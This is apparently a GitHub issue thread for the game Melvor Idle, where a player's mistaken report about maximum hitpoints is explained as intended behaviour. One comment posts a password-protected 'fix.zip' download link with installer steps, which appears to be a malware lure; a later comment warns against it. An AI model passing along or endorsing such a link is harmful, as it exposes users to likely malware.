### ISSUE TITLE
[Bug]: Hitpoints level doesn't increase maximum hitpoints

### ISSUE THREAD

**Issue by FakeBounce** [MelvorIdle/melvoridle.github.io#4598]
### Describe the bug

I created a character yesterday, did some fighting. My hitpoints levels is 10 but i only have 100 max hitpoints.

### Expected behaviour

Considering the wiki and what people say, i should have 190 or 200 maximum hitpoints

### Save Link - Required if issue occurs with a save

https://melvoridle.com/save/c25ksgRq

### Screenshots

![image](https://github.com/user-attachments/assets/05033bbe-868a-41ca-8226-68d73a1f6f79)

### Which platforms are you experiencing this bug on?

- [ ] Chrome
- [ ] Firefox
- [ ] Edge
- [ ] Safari
- [X] Steam
- [ ] Epic Games
- [ ] Mobile App (iOS)
- [ ] Mobile App (Android)
- [ ] Mobile App (Android Beta)
- [ ] Other (Please Specify)

### Which expansions are purchased and active at the time of the bug?

- [ ] Throne of the Herald
- [ ] Atlas of Discovery
- [ ] Into the Abyss

### Which version of the game are you experiencing this bug on?

v1.3

### Game Subversion

?11753

### Are you using any mods?

No

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 04Slash** [comment]
Do not download the above file. This is likely a virus and it will not help with this issue.

**Comment by Ayarez** [comment]
Level 10 Hitpoints is where you start at. Hitpoints levels give 10 HP per level in the Melvor realm.

Level 10 would be 10x10 is 100 hp at level 10. It is working correctly

**Comment by FakeBounce** [comment]
I thought i started lvl 1 and gained 9 levels without hitpoints, my bad.
